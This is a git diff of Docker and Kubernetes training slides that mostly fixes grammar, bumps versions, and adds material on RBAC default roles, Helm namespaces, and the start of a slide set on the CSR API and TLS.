|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
@@ -121,7 +119,7 @@ Now, how are things for our IAAS provider?
|
||||
- Solution: *migrate* VMs and shutdown empty servers
|
||||
|
||||
(e.g. combine two hypervisors with 40% load into 80%+0%,
|
||||
<br/>and shutdown the one at 0%)
|
||||
<br/>and shut down the one at 0%)
|
||||
|
||||
---
|
||||
|
||||
@@ -129,7 +127,7 @@ Now, how are things for our IAAS provider?
|
||||
|
||||
How do we implement this?
|
||||
|
||||
- Shutdown empty hosts (but keep some spare capacity)
|
||||
- Shut down empty hosts (but keep some spare capacity)
|
||||
|
||||
- Start hosts again when capacity gets low
|
||||
|
||||
@@ -177,7 +175,7 @@ In practice, these goals often conflict.
|
||||
|
||||
- 16 GB RAM, 8 cores, 1 TB disk
|
||||
|
||||
- Each week, your team asks:
|
||||
- Each week, your team requests:
|
||||
|
||||
- one VM with X RAM, Y CPU, Z disk
|
||||
|
||||
|
||||
@@ -72,7 +72,7 @@
|
||||
|
||||
- For memory usage, the mechanism is part of the *cgroup* subsystem.
|
||||
|
||||
- This subsystem allows to limit the memory for a process or a group of processes.
|
||||
- This subsystem allows limiting the memory for a process or a group of processes.
|
||||
|
||||
- A container engine leverages these mechanisms to limit memory for a container.
|
||||
|
||||
|
||||
@@ -45,13 +45,13 @@ individual Docker VM.*
|
||||
|
||||
- The Docker Engine is a daemon (a service running in the background).
|
||||
|
||||
- This daemon manages containers, the same way that an hypervisor manages VMs.
|
||||
- This daemon manages containers, the same way that a hypervisor manages VMs.
|
||||
|
||||
- We interact with the Docker Engine by using the Docker CLI.
|
||||
|
||||
- The Docker CLI and the Docker Engine communicate through an API.
|
||||
|
||||
- There are many other programs, and many client libraries, to use that API.
|
||||
- There are many other programs and client libraries which use that API.
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:
|
||||
|
||||
* Sharing a *single file* between the host and a container.
|
||||
|
||||
* Using remote storage and custom storage with "volume drivers".
|
||||
* Using remote storage and custom storage with *volume drivers*.
|
||||
|
||||
---
|
||||
|
||||
## Volumes are special directories in a container
|
||||
|
||||
Volumes can be declared in two different ways.
|
||||
Volumes can be declared in two different ways:
|
||||
|
||||
* Within a `Dockerfile`, with a `VOLUME` instruction.
|
||||
|
||||
@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.
|
||||
|
||||
* Volumes are used with the `-v` option.
|
||||
|
||||
* When a host path does not contain a /, it is considered to be a volume name.
|
||||
* When a host path does not contain a `/`, it is considered a volume name.
|
||||
|
||||
Let's start a web server using the two previous volumes.
|
||||
|
||||
@@ -189,7 +189,7 @@ $ curl localhost:1234
|
||||
|
||||
* In this example, we will run a text editor in the other container.
|
||||
|
||||
(But this could be a FTP server, a WebDAV server, a Git receiver...)
|
||||
(But this could be an FTP server, a WebDAV server, a Git receiver...)
|
||||
|
||||
Let's start another container using the `webapps` volume.
|
||||
|
||||
|
||||
@@ -1,3 +1,11 @@
|
||||
- date: [2019-11-04, 2019-11-05]
|
||||
country: de
|
||||
city: Berlin
|
||||
event: Velocity
|
||||
speaker: jpetazzo
|
||||
title: Deploying and scaling applications with Kubernetes
|
||||
attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
|
||||
|
||||
- date: 2019-11-13
|
||||
country: fr
|
||||
city: Marseille
|
||||
@@ -31,6 +39,7 @@
|
||||
title: Kubernetes for administrators and operators
|
||||
speaker: jpetazzo
|
||||
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
|
||||
slides: https://kadm-2019-06.container.training/
|
||||
|
||||
- date: 2019-05-01
|
||||
country: us
|
||||
|
||||
@@ -30,27 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- |
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- |
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -64,13 +48,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- |
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Composefile.md
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -30,9 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -45,6 +47,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -356,9 +356,9 @@ We demonstrated *update* and *watch* semantics.
|
||||
|
||||
- we create a Deployment object
|
||||
|
||||
- the Deployment controller notices it, creates a ReplicaSet
|
||||
- the Deployment controller notices it, and creates a ReplicaSet
|
||||
|
||||
- the ReplicaSet controller notices it, creates a Pod
|
||||
- the ReplicaSet controller notices the ReplicaSet, and creates a Pod
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- When the API server receives a request, it tries to authenticate it
|
||||
|
||||
(it examines headers, certificates ... anything available)
|
||||
(it examines headers, certificates... anything available)
|
||||
|
||||
- Many authentication methods are available and can be used simultaneously
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
- the user ID
|
||||
- a list of groups
|
||||
|
||||
- The API server doesn't interpret these; it'll be the job of *authorizers*
|
||||
- The API server doesn't interpret these; that'll be the job of *authorizers*
|
||||
|
||||
---
|
||||
|
||||
@@ -50,7 +50,7 @@
|
||||
|
||||
- [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
|
||||
|
||||
(carrying user and password in a HTTP header)
|
||||
(carrying user and password in an HTTP header)
|
||||
|
||||
- Authentication proxy
|
||||
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
(i.e. they are not stored in etcd or anywhere else)
|
||||
|
||||
- Users can be created (and given membership to groups) independently of the API
|
||||
- Users can be created (and added to groups) independently of the API
|
||||
|
||||
- The Kubernetes API can be set up to use your custom CA to validate client certs
|
||||
|
||||
@@ -143,19 +143,21 @@ class: extra-details
|
||||
|
||||
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
|
||||
|
||||
- As a result, we cannot easily suspend a user's access
|
||||
- As a result, we don't have an easy way to terminate someone's access
|
||||
|
||||
- There are workarounds, but they are very inconvenient:
|
||||
(if their key is compromised, or they leave the organization)
|
||||
|
||||
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
|
||||
- Option 1: re-create a new CA and re-issue everyone's certificates
|
||||
<br/>
|
||||
→ Maybe OK if we only have a few users; no way otherwise
|
||||
|
||||
- re-create the CA and re-issue all certificates in case of compromise
|
||||
- Option 2: don't use groups; grant permissions to individual users
|
||||
<br/>
|
||||
→ Inconvenient if we have many users and teams; error-prone
|
||||
|
||||
- grant permissions to individual users, not groups
|
||||
<br/>
|
||||
(and remove all permissions to a compromised user)
|
||||
|
||||
- Until this is fixed, we probably want to use other methods
|
||||
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
|
||||
<br/>
|
||||
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
|
||||
|
||||
---
|
||||
|
||||
@@ -191,7 +193,7 @@ class: extra-details
|
||||
|
||||
(the kind that you can view with `kubectl get secrets`)
|
||||
|
||||
- Service accounts are generally used to grant permissions to applications, services ...
|
||||
- Service accounts are generally used to grant permissions to applications, services...
|
||||
|
||||
(as opposed to humans)
|
||||
|
||||
@@ -215,7 +217,7 @@ class: extra-details
|
||||
|
||||
.exercise[
|
||||
|
||||
- The resource name is `serviceaccount` or `sa` in short:
|
||||
- The resource name is `serviceaccount` or `sa` for short:
|
||||
```bash
|
||||
kubectl get sa
|
||||
```
|
||||
@@ -307,7 +309,7 @@ class: extra-details
|
||||
|
||||
- The API "sees" us as a different user
|
||||
|
||||
- But neither user has any right, so we can't do nothin'
|
||||
- But neither user has any rights, so we can't do nothin'
|
||||
|
||||
- Let's change that!
|
||||
|
||||
@@ -337,9 +339,9 @@ class: extra-details
|
||||
|
||||
- A rule is a combination of:
|
||||
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
|
||||
|
||||
- resources (as in "API resource", like pods, nodes, services ...)
|
||||
- resources (as in "API resource," like pods, nodes, services...)
|
||||
|
||||
- resource names (to specify e.g. one specific pod instead of all pods)
|
||||
|
||||
@@ -373,13 +375,13 @@ class: extra-details
|
||||
|
||||
- We can also define API resources ClusterRole and ClusterRoleBinding
|
||||
|
||||
- These are a superset, allowing to:
|
||||
- These are a superset, allowing us to:
|
||||
|
||||
- specify actions on cluster-wide objects (like nodes)
|
||||
|
||||
- operate across all namespaces
|
||||
|
||||
- We can create Role and RoleBinding resources within a namespaces
|
||||
- We can create Role and RoleBinding resources within a namespace
|
||||
|
||||
- ClusterRole and ClusterRoleBinding resources are global
|
||||
|
||||
@@ -387,13 +389,13 @@ class: extra-details
|
||||
|
||||
## Pods and service accounts
|
||||
|
||||
- A pod can be associated to a service account
|
||||
- A pod can be associated with a service account
|
||||
|
||||
- by default, it is associated to the `default` service account
|
||||
- by default, it is associated with the `default` service account
|
||||
|
||||
- as we've seen earlier, this service account has no permission anyway
|
||||
- as we saw earlier, this service account has no permissions anyway
|
||||
|
||||
- The associated token is exposed into the pod's filesystem
|
||||
- The associated token is exposed to the pod's filesystem
|
||||
|
||||
(in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
|
||||
|
||||
@@ -407,7 +409,7 @@ class: extra-details
|
||||
|
||||
- We are going to create a service account
|
||||
|
||||
- We will use an existing cluster role (`view`)
|
||||
- We will use a default cluster role (`view`)
|
||||
|
||||
- We will bind together this role and this service account
|
||||
|
||||
@@ -458,7 +460,7 @@ class: extra-details
|
||||
|
||||
]
|
||||
|
||||
It's important to note a couple of details in these flags ...
|
||||
It's important to note a couple of details in these flags...
|
||||
|
||||
---
|
||||
|
||||
@@ -491,13 +493,13 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
- again, the command would have worked fine (no error)
|
||||
|
||||
- ... but our API requests would have been denied later
|
||||
- ...but our API requests would have been denied later
|
||||
|
||||
- What's about the `default:` prefix?
|
||||
|
||||
- that's the namespace of the service account
|
||||
|
||||
- yes, it could be inferred from context, but ... `kubectl` requires it
|
||||
- yes, it could be inferred from context, but... `kubectl` requires it
|
||||
|
||||
---
|
||||
|
||||
@@ -574,6 +576,51 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where does this `view` role come from?
|
||||
|
||||
- Kubernetes defines a number of ClusterRoles intended to be bound to users
|
||||
|
||||
- `cluster-admin` can do *everything* (think `root` on UNIX)
|
||||
|
||||
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
|
||||
|
||||
- `edit` is similar to `admin`, but cannot view or edit permissions
|
||||
|
||||
- `view` has read-only access to most resources, except permissions and secrets
|
||||
|
||||
*In many situations, these roles will be all you need.*
|
||||
|
||||
*You can also customize them!*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Customizing the default roles
|
||||
|
||||
- If you need to *add* permissions to these default roles (or others),
|
||||
<br/>
|
||||
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
|
||||
|
||||
- This happens by creating a ClusterRole with the following labels:
|
||||
```yaml
|
||||
metadata:
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
```
|
||||
|
||||
- This ClusterRole permissions will be added to `admin`/`edit`/`view` respectively
|
||||
|
||||
- This is particulary useful when using CustomResourceDefinitions
|
||||
|
||||
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where do our permissions come from?
|
||||
|
||||
- When interacting with the Kubernetes API, we are using a client certificate
|
||||
@@ -605,7 +652,7 @@ class: extra-details
|
||||
kubectl describe clusterrolebinding cluster-admin
|
||||
```
|
||||
|
||||
- This binding associates `system:masters` to the cluster role `cluster-admin`
|
||||
- This binding associates `system:masters` with the cluster role `cluster-admin`
|
||||
|
||||
- And the `cluster-admin` is, basically, `root`:
|
||||
```bash
|
||||
@@ -620,7 +667,7 @@ class: extra-details
|
||||
|
||||
- For auditing purposes, sometimes we want to know who can perform an action
|
||||
|
||||
- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
|
||||
- There is a proof-of-concept tool by Aqua Security which does exactly that:
|
||||
|
||||
https://github.com/aquasecurity/kubectl-who-can
|
||||
|
||||
|
||||
@@ -20,15 +20,15 @@
|
||||
|
||||
- Configuring routing tables in the cloud network (specific to GCE)
|
||||
|
||||
- Updating node labels to indicate region, zone, instance type ...
|
||||
- Updating node labels to indicate region, zone, instance type...
|
||||
|
||||
- Obtain node name, internal and external addresses from cloud metadata service
|
||||
|
||||
- Deleting nodes from Kubernetes when they're deleted in the cloud
|
||||
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks ...)
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks...)
|
||||
|
||||
(Eventually, volumes will be managed by the CSI)
|
||||
(Eventually, volumes will be managed by the Container Storage Interface)
|
||||
|
||||
---
|
||||
|
||||
@@ -83,7 +83,7 @@ The list includes the following providers:
|
||||
|
||||
## Audience questions
|
||||
|
||||
- What kind of clouds are you using / planning to use?
|
||||
- What kind of clouds are you using/planning to use?
|
||||
|
||||
- What kind of details would you like to see in this section?
|
||||
|
||||
@@ -105,7 +105,7 @@ The list includes the following providers:
|
||||
|
||||
- When using managed clusters, this is done automatically
|
||||
|
||||
- There is very little documentation to write the configuration file
|
||||
- There is very little documentation on writing the configuration file
|
||||
|
||||
(except for OpenStack)
|
||||
|
||||
@@ -123,7 +123,7 @@ The list includes the following providers:
|
||||
|
||||
- To get these addresses, the node needs to communicate with the control plane
|
||||
|
||||
- ... Which means joining the cluster
|
||||
- ...Which means joining the cluster
|
||||
|
||||
(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
|
||||
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
- error recovery (human or process has altered or corrupted data)
|
||||
|
||||
- cloning environments (for testing, validation ...)
|
||||
- cloning environments (for testing, validation...)
|
||||
|
||||
- Let's see the strategies and tools available with Kubernetes!
|
||||
|
||||
@@ -18,13 +18,13 @@
|
||||
|
||||
(it gives us replication primitives)
|
||||
|
||||
- Kubernetes helps us to clone / replicate environments
|
||||
- Kubernetes helps us clone / replicate environments
|
||||
|
||||
(all resources can be described with manifests)
|
||||
|
||||
- Kubernetes *does not* help us with error recovery
|
||||
|
||||
- We still need to backup / snapshot our data:
|
||||
- We still need to back up/snapshot our data:
|
||||
|
||||
- with database backups (mysqldump, pgdump, etc.)
|
||||
|
||||
@@ -58,7 +58,7 @@
|
||||
|
||||
- If our deployment system isn't fully automated, it should at least be documented
|
||||
|
||||
- Litmus test: how long does it take to deploy a cluster ...
|
||||
- Litmus test: how long does it take to deploy a cluster...
|
||||
|
||||
- for a senior engineer?
|
||||
|
||||
@@ -66,7 +66,7 @@
|
||||
|
||||
- Does it require external intervention?
|
||||
|
||||
(e.g. provisioning servers, signing TLS certs ...)
|
||||
(e.g. provisioning servers, signing TLS certs...)
|
||||
|
||||
---
|
||||
|
||||
@@ -108,7 +108,7 @@
|
||||
|
||||
- For real applications: add resources (as YAML files)
|
||||
|
||||
- For applications deployed multiple times: Helm, Kustomize ...
|
||||
- For applications deployed multiple times: Helm, Kustomize...
|
||||
|
||||
(staging and production count as "multiple times")
|
||||
|
||||
|
||||
@@ -166,7 +166,7 @@
|
||||
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
apt install kubelet=1.14.1-00
|
||||
apt install kubelet=1.14.2-00
|
||||
```
|
||||
|
||||
]
|
||||
@@ -267,7 +267,7 @@
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.14.1
|
||||
sudo kubeadm upgrade apply v1.14.2
|
||||
```
|
||||
|
||||
]
|
||||
@@ -287,8 +287,8 @@
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
|
||||
ssh node $N sudo apt install kubelet=1.14.1-00
|
||||
ssh test$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
|
||||
ssh test$N sudo apt install kubelet=1.14.2-00
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -297,7 +297,7 @@
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.14.1
|
||||
- All our nodes should now be updated to version 1.14.2
|
||||
|
||||
.exercise[
|
||||
|
||||
|
||||
@@ -26,7 +26,7 @@
|
||||
|
||||
The reference plugins are available [here].
|
||||
|
||||
Look into each plugin's directory for its documentation.
|
||||
Look in each plugin's directory for its documentation.
|
||||
|
||||
[here]: https://github.com/containernetworking/plugins/tree/master/plugins
|
||||
|
||||
@@ -66,6 +66,8 @@ Look into each plugin's directory for its documentation.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Conf vs conflist
|
||||
|
||||
- There are two slightly different configuration formats
|
||||
@@ -98,7 +100,7 @@ class: extra-details
|
||||
|
||||
- CNI_NETNS: path to network namespace file
|
||||
|
||||
- CNI_IFNAME: how the network interface should be named
|
||||
- CNI_IFNAME: what the network interface should be named
|
||||
|
||||
- The network configuration must be provided to the plugin on stdin
|
||||
|
||||
@@ -188,12 +190,16 @@ class: extra-details
|
||||
|
||||
- ... But this time, the controller manager will allocate `podCIDR` subnets
|
||||
|
||||
- We will start kube-router with a DaemonSet
|
||||
(so that we don't have to manually assign subnets to individual nodes)
|
||||
|
||||
- This DaemonSet will start one instance of kube-router on each node
|
||||
- We will create a DaemonSet for kube-router
|
||||
|
||||
- We will join nodes to the cluster
|
||||
|
||||
- The DaemonSet will automatically start a kube-router pod on each node
|
||||
|
||||
---
|
||||
|
||||
|
||||
## Logging into the new cluster
|
||||
|
||||
.exercise[
|
||||
@@ -221,7 +227,7 @@ class: extra-details
|
||||
- It is similar to the one we used with the `kubenet` cluster
|
||||
|
||||
- The API server is started with `--allow-privileged`
|
||||
|
||||
|
||||
(because we will start kube-router in privileged pods)
|
||||
|
||||
- The controller manager is started with extra flags too:
|
||||
@@ -254,7 +260,7 @@ class: extra-details
|
||||
|
||||
---
|
||||
|
||||
## The kube-router DaemonSet
|
||||
## The kube-router DaemonSet
|
||||
|
||||
- In the same directory, there is a `kuberouter.yaml` file
|
||||
|
||||
@@ -272,7 +278,7 @@ class: extra-details
|
||||
|
||||
- The address of the API server will be `http://A.B.C.D:8080`
|
||||
|
||||
(where `A.B.C.D` is the address of `kuberouter1`, running the control plane)
|
||||
(where `A.B.C.D` is the public address of `kuberouter1`, running the control plane)
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -300,12 +306,10 @@ Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
|
||||
|
||||
- Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
|
||||
```bash
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-cluster kubenet --server http://`X.X.X.X`:8080
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-context kubenet --cluster kubenet
|
||||
kubectl --kubeconfig ~/kubeconfig config\
|
||||
use-context kubenet
|
||||
kubectl config set-cluster cni --server http://`X.X.X.X`:8080
|
||||
kubectl config set-context cni --cluster cni
|
||||
kubectl config use-context cni
|
||||
cp ~/.kube/config ~/kubeconfig
|
||||
```
|
||||
|
||||
]
|
||||
@@ -451,7 +455,7 @@ We should see the local pod CIDR connected to `kube-bridge`, and the other nodes
|
||||
|
||||
- Or try to exec into one of the kube-router pods:
|
||||
```bash
|
||||
kubectl -n kube-system exec kuber-router-xxxxx bash
|
||||
kubectl -n kube-system exec kube-router-xxxxx bash
|
||||
```
|
||||
|
||||
]
|
||||
@@ -487,8 +491,8 @@ What does that mean?
|
||||
|
||||
- First, get the container ID, with `docker ps` or like this:
|
||||
```bash
|
||||
CID=$(docker ps
|
||||
--filter label=io.kubernetes.pod.namespace=kube-system
|
||||
CID=$(docker ps -q \
|
||||
--filter label=io.kubernetes.pod.namespace=kube-system \
|
||||
--filter label=io.kubernetes.container.name=kube-router)
|
||||
```
|
||||
|
||||
@@ -573,7 +577,7 @@ done
|
||||
|
||||
## Starting the route reflector
|
||||
|
||||
- Only do this if you are doing this on your own
|
||||
- Only do this slide if you are doing this on your own
|
||||
|
||||
- There is a Compose file in the `compose/frr-route-reflector` directory
|
||||
|
||||
@@ -599,13 +603,13 @@ done
|
||||
|
||||
## Updating kube-router configuration
|
||||
|
||||
- We need to add two command-line flags to the kube-router process
|
||||
- We need to pass two command-line flags to the kube-router process
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the `kuberouter.yaml` file
|
||||
|
||||
- Add the following flags to the kube-router arguments,:
|
||||
- Add the following flags to the kube-router arguments:
|
||||
```
|
||||
- "--peer-router-ips=`X.X.X.X`"
|
||||
- "--peer-router-asns=64512"
|
||||
|
||||
@@ -136,6 +136,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane on special nodes
|
||||
|
||||
- It is common to reserve a dedicated node for the control plane
|
||||
@@ -158,6 +160,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane outside containers
|
||||
|
||||
- The services of the control plane can run in or out of containers
|
||||
@@ -173,10 +177,12 @@ class: pic
|
||||
|
||||
- In that case, there is no "master node"
|
||||
|
||||
*For this reason, it is more accurate to say "control plane" rather than "master".*
|
||||
*For this reason, it is more accurate to say "control plane" rather than "master."*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
No!
|
||||
@@ -193,6 +199,8 @@ No!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
Yes!
|
||||
@@ -215,6 +223,8 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
- On our development environments, CI pipelines ... :
|
||||
@@ -231,25 +241,21 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes resources
|
||||
## Interacting with Kubernetes
|
||||
|
||||
- The Kubernetes API defines a lot of objects called *resources*
|
||||
- We will interact with our Kubernetes cluster through the Kubernetes API
|
||||
|
||||
- These resources are organized by type, or `Kind` (in the API)
|
||||
- The Kubernetes API is (mostly) RESTful
|
||||
|
||||
- It allows us to create, read, update, delete *resources*
|
||||
|
||||
- A few common resource types are:
|
||||
|
||||
- node (a machine — physical or virtual — in our cluster)
|
||||
|
||||
- pod (group of containers running together on a node)
|
||||
|
||||
- service (stable network endpoint to connect to one or multiple containers)
|
||||
- namespace (more-or-less isolated group of things)
|
||||
- secret (bundle of sensitive data to be passed to a container)
|
||||
|
||||
And much more!
|
||||
|
||||
- We can see the full list by running `kubectl api-resources`
|
||||
|
||||
(In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- There are many ways to pass configuration to code running in a container:
|
||||
|
||||
- baking it in a custom image
|
||||
- baking it into a custom image
|
||||
|
||||
- command-line arguments
|
||||
|
||||
@@ -125,7 +125,7 @@
|
||||
|
||||
- We can also use a mechanism called the *downward API*
|
||||
|
||||
- The downward API allows to expose pod or container information
|
||||
- The downward API allows exposing pod or container information
|
||||
|
||||
- either through special files (we won't show that for now)
|
||||
|
||||
@@ -436,7 +436,7 @@ We should see connections served by Google, and others served by IBM.
|
||||
|
||||
- We are going to store the port number in a configmap
|
||||
|
||||
- Then we will expose that configmap to a container environment variable
|
||||
- Then we will expose that configmap as a container environment variable
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
```bash
|
||||
|
||||
while read kind name; do
|
||||
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
kubectl get -o yaml $kind $name > dockercoins/templates/$name-$kind.yaml
|
||||
done <<EOF
|
||||
deployment worker
|
||||
deployment hasher
|
||||
@@ -69,3 +69,46 @@
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
---
|
||||
|
||||
## Switching to another namespace
|
||||
|
||||
- We can create a new namespace and switch to it
|
||||
|
||||
(Helm will automatically use the namespace specified in our context)
|
||||
|
||||
- We can also tell Helm which namespace to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Helm to use a specific namespace:
|
||||
```bash
|
||||
helm install dockercoins --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=magenta
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
|
||||
426
slides/k8s/csr-api.md
Normal file
426
slides/k8s/csr-api.md
Normal file
@@ -0,0 +1,426 @@
|
||||
# The CSR API
|
||||
|
||||
- The Kubernetes API exposes CSR resources
|
||||
|
||||
- We can use these resources to issue TLS certificates
|
||||
|
||||
- First, we will go through a quick reminder about TLS certificates
|
||||
|
||||
- Then, we will see how to obtain a certificate for a user
|
||||
|
||||
- We will use that certificate to authenticate with the cluster
|
||||
|
||||
- Finally, we will grant some privileges to that user
|
||||
|
||||
---
|
||||
|
||||
## Reminder about TLS
|
||||
|
||||
- TLS (Transport Layer Security) is a protocol providing:
|
||||
|
||||
- encryption (to prevent eavesdropping)
|
||||
|
||||
- authentication (using public key cryptography)
|
||||
|
||||
- When we access an https:// URL, the server authenticates itself
|
||||
|
||||
(it proves its identity to us; as if it were "showing its ID")
|
||||
|
||||
- But we can also have mutual TLS authentication (mTLS)
|
||||
|
||||
(client proves its identity to server; server proves its identity to client)
|
||||
|
||||
---
|
||||
|
||||
## Authentication with certificates
|
||||
|
||||
- To authenticate, someone (client or server) needs:
|
||||
|
||||
- a *private key* (that remains known only to them)
|
||||
|
||||
- a *public key* (that they can distribute)
|
||||
|
||||
- a *certificate* (associating the public key with an identity)
|
||||
|
||||
- A message encrypted with the private key can only be decrypted with the public key
|
||||
|
||||
(and vice versa)
|
||||
|
||||
- If I use someone's public key to encrypt/decrypt their messages,
|
||||
<br/>
|
||||
I can be certain that I am talking to them / they are talking to me
|
||||
|
||||
- The certificate proves that I have the correct public key for them
|
||||
|
||||
---
|
||||
|
||||
## Certificate generation workflow
|
||||
|
||||
This is what I do if I want to obtain a certificate.
|
||||
|
||||
1. Create public and private keys.
|
||||
|
||||
2. Create a Certificate Signing Request (CSR).
|
||||
|
||||
(The CSR contains the identity that I claim and a public key.)
|
||||
|
||||
3. Send that CSR to the Certificate Authority (CA).
|
||||
|
||||
4. The CA verifies that I can claim the identity in the CSR.
|
||||
|
||||
5. The CA generates my certificate and gives it to me.
|
||||
|
||||
The CA (or anyone else) never needs to know my private key.
|
||||
|
||||
---
